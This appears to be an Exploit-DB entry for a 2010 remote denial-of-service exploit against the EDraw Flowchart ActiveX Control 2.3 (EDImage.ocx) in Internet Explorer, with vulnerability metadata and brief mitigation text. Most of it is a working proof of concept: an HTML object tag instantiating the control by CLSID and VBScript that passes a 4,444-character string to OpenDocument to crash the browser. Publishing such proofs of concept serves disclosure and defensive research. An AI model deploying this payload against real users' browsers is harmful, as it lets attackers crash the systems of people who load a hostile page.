EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)

vendor:

EDraw Flowchart ActiveX Control

by:

Gjoko 'LiquidWorm' Krstic

7.5

CVSS

HIGH

Remote Denial of Service (DoS)

CWE

Product Name: EDraw Flowchart ActiveX Control

Affected Version From: 2.3

Affected Version To: 2.3

Patch Exists: NO

Related CWE:

CPE: a:edrawsoft:edraw_flowchart_activex_control:2.3

Metasploit:

Other Scripts:

Platforms Tested: MS Win XP Pro SP3 (en) / IE 8.0

2010

EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)

This exploit targets the EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) and causes a remote Denial of Service (DoS) attack. By providing a large string as an argument to the 'OpenDocument' function, the control crashes, resulting in a DoS condition. This exploit specifically targets Internet Explorer.

Mitigation:

To mitigate this vulnerability, users are advised to avoid visiting untrusted websites or opening suspicious files. Additionally, keeping the software and operating system up to date with the latest patches and security updates is recommended.

Source

Exploit-DB raw data:

######################


 EDraw Flowchart ActiveX Control 2.3 (EDImage.ocx) Remote DoS Exploit (IE)


 Vendor: EdrawSoft - http://www.edrawsoft.com

 Platform Used: MS Win XP Pro SP3 (en) / IE 8.0


 CompanyName		EDrawSoft
 FileDescription	EDraw Flowchart ActiveX Control Module
 FileVersion		2, 3, 0, 6
 InternalName		EDrawSoft
 LegalCopyright		Copyright (C) 2005
 OriginalFileName	EDImage.OCX
 ProductName		EDraw Flowchart ActiveX Control Module
 ProductVersion		2, 3, 0, 6

 Report for Clsid: {F685AFD8-A5CC-410E-98E4-BAA1C559BA61}
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False


 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

 Zero Science Lab - http://www.zeroscience.mk

 liquidworm gmail com



 18.04.2010


 Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4936.php


######################


 <object classid='clsid:F685AFD8-A5CC-410E-98E4-BAA1C559BA61' id='thricer' />
 <script language='vbscript'>

 targetFile = "C:\PROGRA~1\EDIMAG~1\EDImage.ocx"
 prototype  = "Function OpenDocument ( ByVal filename As String ) As Boolean"
 memberName = "OpenDocument"
 progid     = "EDIMAGELib.EDImage"
 argCount   = 1

 arg1=String(4444, "J")

 thricer.OpenDocument arg1 

 </script>